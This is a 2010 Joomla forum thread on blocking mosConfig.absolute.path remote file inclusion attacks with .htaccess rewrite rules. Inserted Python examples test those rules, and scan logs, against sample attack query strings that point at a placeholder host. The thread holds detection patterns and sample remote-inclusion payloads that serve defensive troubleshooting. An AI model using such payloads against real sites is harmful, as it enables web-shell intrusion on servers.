mosConfig.absolute.path attack - can't stop with htaccess!!!

mexicoshaun
Joomla! Fledgling
Posts: 4
Joined: Fri May 22, 2009 9:06 pm

mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by mexicoshaun » Wed Mar 10, 2010 6:24 pm

OK, I don't usually post but this is driving me mad!

Joomla 1.0.15 + VirtueMart + SEF

I have the htaccess supposedly blocking injection through the mosConfig.absolute.path exploit, but it doesn't work, i.e. if I put the URL in it still loads the remote hack file.

The URL example being used to attack me is
http://www.mysite.co.uk/index.php?optio ... content/x??

The web page that appears is a shell which enables you to browse the server, upload files, etc., so not good as it's a shared server.

The line I have in htaccess which should work is the standard:

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]



At the moment I am resorting to trying to block other aspects of the URL [not working well] and denying IP addresses [yes I know...]

Any insight would be much appreciated. I tend to blame VirtueMart as I have other 1.1.15 sites without these issues.

TIA to any and all

-------------------HTACCESS-FOLLOWS-----------------------

## Can be commented out if causes errors, see notes above.
Options FollowSymLinks

# mod_rewrite in use
RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla/MamboDirectory (just / for root)

RewriteBase /

# Trying to block attacker
order allow,deny
deny from 110.138.192.72
deny from 66.216.127.211
allow from all


########## Begin 3rd Party or Core SEF Section

#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteCond %{REQUEST_URI} !^/.+astringintheurl.+/?$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php

########## End 3rd Party or Core SEF Section


php_flag magic_quotes_gpc on
php_flag register_globals off

---------------------------------------------------------------------

fcoulter
Joomla! Ace
Posts: 1685
Joined: Thu Sep 13, 2007 11:39 am
Location: UK

Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by fcoulter » Wed Mar 10, 2010 6:49 pm

You might try modifying the line

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

I had similar problems to you. The problem with that line is that it is too specific; it does not cover some types of attack that use mosConfig.

I changed it to

RewriteCond %{QUERY_STRING} .*mosConfig.*[OR]
RewriteCond %{QUERY_STRING} .*mosconfig.*[OR]

It should work for you, it did for me.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by mandville » Wed Mar 10, 2010 7:15 pm

I have locked your other topic. Apart from suggesting the migration to 1.5.15, the advice by fcoulter is quite valid.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by mexicoshaun » Wed Mar 10, 2010 7:31 pm

Thanks

Thanks to fcoulter for the solution to many days' headaches - that worked - it does indeed seem that that line was too specific.

For anyone else wanting to implement this, make sure you add a space between * and [OR], as the syntax made it not work at first for me, so if you want to copy and paste this is spot on -

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by fcoulter » Thu Mar 11, 2010 11:22 am

Sorry, yes, the space is important!

In fact I also used

RewriteCond %{QUERY_STRING} .*http:.* [OR]

That effectively blocked out all attempts at remote file inclusion through mosConfig or other means. But you need to think before using this, because there might be legitimate reasons for including a URL in the query string on your site, in which case this will cause problems.

I was getting a lot of attempts at remote file inclusion aimed at software I didn't even have installed on my site!! It was getting rather annoying, so this put a stop to it.
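As an added illustration (this is not code from the thread), the small Python harness below applies the original RewriteCond pattern, the broadened mosConfig pattern and the http: pattern to a few constructed query strings. It assumes the attack used the dotted parameter name from the thread title, which PHP's register_globals maps onto the same $mosConfig_absolute_path variable as the underscore form; the hostnames are placeholders.

```python
import re
from urllib.parse import parse_qsl

# The thread's original RewriteCond pattern: expects mosConfig_<letters/underscores>=
ORIGINAL_RULE = re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)")
# fcoulter's broadened pattern (the two RewriteCond lines folded into one regex)
BROADENED_RULE = re.compile(r"mosConfig|mosconfig")
# fcoulter's "block any URL in the query string" pattern
HTTP_RULE = re.compile(r"http:")


def blocked_by(rule, query_string):
    """True if mod_rewrite would match this RewriteCond against %{QUERY_STRING}.
    mod_rewrite tests the raw query string, so nothing is URL-decoded here."""
    return rule.search(query_string) is not None


def php_globals(query_string):
    """Variable names PHP registers from the query when register_globals is on.
    PHP rewrites '.' and ' ' in a parameter name to '_', so a request carrying
    mosConfig.absolute.path=... still overwrites $mosConfig_absolute_path."""
    return [name.replace(".", "_").replace(" ", "_")
            for name, _ in parse_qsl(query_string, keep_blank_values=True)]


# Constructed sample query strings; the hostnames are placeholders.
SAMPLES = {
    "underscore form": "option=com_content&mosConfig_absolute_path=http://remote.example/x.txt??",
    "dotted form": "option=com_content&mosConfig.absolute.path=http://remote.example/x.txt??",
    "normal request": "option=com_virtuemart&page=shop.browse&Itemid=26",
    "legit URL param": "option=com_user&return=http://www.mysite.example/index.php",
}


def evaluate(query_string):
    """Which rules fire on one query string, and which PHP globals it would set."""
    return {
        "original": blocked_by(ORIGINAL_RULE, query_string),
        "broadened": blocked_by(BROADENED_RULE, query_string),
        "http": blocked_by(HTTP_RULE, query_string),
        "globals": php_globals(query_string),
    }


if __name__ == "__main__":
    for label, qs in SAMPLES.items():
        print(f"{label:16} {evaluate(qs)}")
```

The "legit URL param" sample is the false positive fcoulter warns about: the http: rule blocks it even though nothing touches mosConfig.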

jaimeschu
Joomla! Apprentice
Posts: 24
Joined: Mon Aug 25, 2008 2:52 pm

Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by jaimeschu » Mon Mar 29, 2010 2:29 pm

I've been having the same issue. Fcoulter - I've applied your fix and I'm hoping it works. It seems that every week though a new directory is added to my root containing all of the spam links. Do you know the names of any PHP files to look out for? For instance, the first time this problem occurred there was an add.php file that I found that contained malicious script.

Any other advice other than the modifications to .htaccess would be appreciated.


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by fcoulter » Mon Mar 29, 2010 3:12 pm

If a new directory is being added to your site then clearly the site security has been compromised. I suggest that you change your ftp passwords for a start.

Also look at this link. http://docs.joomla.org/Security_Checkli ... ng_Started

Good luck with this.


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by mandville » Mon Mar 29, 2010 3:33 pm

You can also use the cron file checker on checklist 7 to notify you of any files.
Also running the forum post tool may highlight some holes/errors to us.


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by jaimeschu » Tue Mar 30, 2010 1:41 pm

Yes, FTP password has been changed. Like I said, this has been happening for a few months now. The odd thing is that the attacks that I appear to be getting are common attacks in earlier versions of Joomla, but I am up to date with all that.

Been through the checklist, not the cron file check though. Will do that today.

Other update: Since the change in .htaccess file, there are no recorded attacks based on what I see on sh404SEF. Not too sure what to think on this fact because I know we have been getting many attacks and by seeing it in the sh404SEF dashboard I know that the attacks have been blocked. Still, I don't see any new directories this morning and there are no weird links hidden in my index.php.


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by fcoulter » Tue Mar 30, 2010 2:09 pm

If you have blocked attacks through your .htaccess file then you will no longer see them in sh404sef, because they are stopped before your Joomla site is loaded, so sh404sef never gets to see them.

You would need to check your site (server) logs to see them.

I have been getting a lot of attacks aimed at earlier versions of Joomla, and indeed other systems that don't even exist on my site, all the more annoying because so utterly pointless.

I also think that there are more exploits aimed at getting hold of ftp passwords these days - that is probably how they got into your site. The problem is that ftp is not very secure.
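Since requests stopped by .htaccess only show up in the web server log, here is an added Python example (not from the thread) that scans constructed Apache combined-format log lines for requests the mosConfig rule matches and reports whether each one was already answered with 403. The IPs, timestamps and hostnames are made up.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed Apache "combined" log lines: IPs, hostnames and times are made up.
LOG_LINES = """\
198.51.100.7 - - [10/Mar/2010:18:02:11 +0000] "GET /index.php?option=com_content&mosConfig.absolute.path=http://remote.example/x.txt?? HTTP/1.1" 403 209 "-" "libwww-perl/5.805"
203.0.113.44 - - [10/Mar/2010:18:03:40 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 14320 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2010:18:05:02 +0000] "GET /index.php?option=com_virtuemart&mosConfig_absolute_path=http://remote.example/x.txt?? HTTP/1.1" 403 209 "-" "libwww-perl/5.805"
192.0.2.9 - - [10/Mar/2010:18:07:55 +0000] "GET /index.php?option=com_user&return=http://www.mysite.example/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The same substring test as the broadened RewriteCond lines in the thread.
SUSPECT_QUERY = re.compile(r"mosConfig|mosconfig")

def parse_line(line):
    """Parse one log entry into a dict, or return None for lines that do not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["query"] = urlsplit(rec["target"]).query
    return rec

def scan(log_text):
    """Return the entries whose query string the mosConfig rule matches.
    'blocked' records whether Apache already answered 403, i.e. the .htaccess
    rule stopped the request before Joomla (and sh404SEF) ever saw it."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and SUSPECT_QUERY.search(rec["query"]):
            rec["blocked"] = rec["status"] == 403
            hits.append(rec)
    return hits

def attempts_per_ip(hits):
    """Count matched requests per client IP, useful before deciding on an IP block."""
    return Counter(h["ip"] for h in hits)

if __name__ == "__main__":
    for h in scan(LOG_LINES):
        print(h["time"], h["ip"], "blocked" if h["blocked"] else "REACHED JOOMLA", h["query"])
```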


Re: mosConfig.absolute.path attack - can't stop with htaccess!!!

Post by jaimeschu » Tue Mar 30, 2010 3:07 pm

I found something I think anyone with this problem should look for:
http://forums.theplanet.com/index.php?showtopic=90109

The script was hidden in a file named data.php. A hacker can call it whatever he wants though. Disturbing.
